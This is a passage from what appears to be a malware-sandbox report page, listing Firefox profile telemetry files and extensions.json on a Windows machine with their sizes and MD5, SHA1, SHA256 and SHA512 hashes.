                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                7478b42b88a62a5f3c171b4dbb4e08550d051152

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                182303184bcdd5af119bcd3909934a6fa35158328acbca315e2c793c7c284bfa

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                16bcc79295cfc32a1d7e3305ff94403631bd8340337d9f8eca5557f78f0d6479ce22635566028e2a2cc81b01bae4fa236b1d07b81f45c699d783e972ed64c5f9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vtr5lvmp.default-release\datareporting\glean\db\data.safe.tmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                6KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                88328c42b461fdb397927bf34aed9877

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                b15d41723cd31b93524a67ff0ef8b0352bd6fa01

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5b567d4d1c94b8f1b2648a13f47209184415543c169ee102f06d71df23bb7d2c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                f9abeb556fcf095b83b8457b27d5d93ace955832d81a097b7848dad72e5f796c44514f100f8e23f98571fab611c09b5a7810e477ed4d761a0df474af040eb58d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vtr5lvmp.default-release\datareporting\glean\events\events
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                de810a66e3f04e06c563e127a21bf185

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                c9746a9f405a86845ed764ebbba89b6528cd9556

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                49b912d0616b67b8031ccc3959363de7b7c66dba3ce048f0b7db25851e9d575f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                bfab129f2145af3f0aafdfa7fc7d04894b2e563d86f2b825197ad9928b2cef3d1c474c0bd71bdbc65dfc39411ec005cfdc62f07a7ec8441c67271dd600ac1c66

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vtr5lvmp.default-release\datareporting\glean\pending_pings\08270349-d545-46da-8842-da77f0bc109b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                16KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                0c64511081ce4140f75bdd639a117a75

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                ba327fe551e17898989d0b8ce0cfb87c25505ebf

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                826d07f4b6e9b05154d3b9346ef03e9de2e4f6f26fff52eac8385a3e057adc73

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                414a3ac856b1cdd0216c8cb5f919d28206cb8ad3dc84a910c3872c6fdc8451f4c5ee5614e88cdcc484682fc71c74db30607bc9de30a35aa8ea28f6d6d2bf8fd1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vtr5lvmp.default-release\datareporting\glean\pending_pings\14dc2613-89de-4928-8872-0954e3b4d0f1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                883B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                cb32bb1b359311d7570dcc0b177fa8bb

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                36fa0e7113dab376ec87e0695c5bd0669b4c1ce7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                082eb97e8fdd9735ab14b6aa4a591095056cb0e755dc78c92e40d3d836f7d47e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                e93ad591760bad80b03897c73a7e6c0609b3518af47ea14f91b1d3617309bd769b7c6443d0fe9de66fad1b87b17fb52cefc1cc816e961aa8f87200a5667bb249

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vtr5lvmp.default-release\datareporting\glean\pending_pings\4faede3a-0f75-4870-9d6e-0807a395e13e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                235B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                9ea2634da483f68dd545922e7e7b25d6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                41a9ea0115f8b930bc849af128651199ba1742e1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5eef0d73587d2f4e76228f9e2dd2db9079f84254b76ceba49b89b91204e9e563

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                09d3b11091d39441abda79dfa6af47ffe21ebdf5cab81be769016f0d3dfed48921bde68896eee100598a71e44bc3d81fe24beeaee06d2a12d8d883e3a3a65969

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vtr5lvmp.default-release\datareporting\glean\pending_pings\a70ce7be-7860-447c-9078-16b54de45dcf
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                886B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2535f5dc0b1a45d97d4985dfe6cab691

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                e14c2888288e2a7c6123a920b992927b9ab93852

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                0a98eb220c8dd72cf29e54ae609ffd925e681f878131167541059fb3eec0a95c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                dbc5b7dea3c096334019161d634e1e21d69c38e0aaf945826420046db1d6214c274384b9bb004ea97b1044a7945ca7a7394f293265fb6483064faa9aa7f7ed3e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vtr5lvmp.default-release\datareporting\glean\pending_pings\b64d38ac-654b-4b14-a951-65b2bf9999cc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                8ef150f9bb3976e1b6529e75ac55c1bb

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                7bfa672f4a94ed529593b994b3b5a8c617462797

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                475f8b0b2c665185952f566720077c28782de28cf53cebf20297a174a8ebcd74

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                99cd1eb420500e50d735e68fef6820573696fec919238ece9554c2a602bc9be819292739a237c98c027fff540bd69ce4fa2404ce4959ba4bbae45f083f17b412

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vtr5lvmp.default-release\datareporting\glean\pending_pings\eb4a5ce2-e74a-4355-9806-43516c5d2eb9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                235B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                569886ab2031bef0e98b05c666a92dbb

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                d1644fd97f65df2d1be39ee466d49305cd5e2941

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4805a15ff8245729b88c5437e50d7630a2de5b46720b7e2055b36a8e7ed9029d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                895d3a9099a2a6d4abf89fefddefb5a7c2718e93a46fe9f74bb669452ffb2f48544d89277385f053fbd09e90833cb6ffe22eab3ad4000d23dd8837b538f78547

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vtr5lvmp.default-release\extensions.json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                16KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                7ee9d037c9281469ef61f1f46d5a1482

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                af3dd1e831d0bef76f12a47cb450ed931196c637

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5c88d82a966bbc54e427422d1431374c2789e94ea87e21cbe6d9f98d286f5881

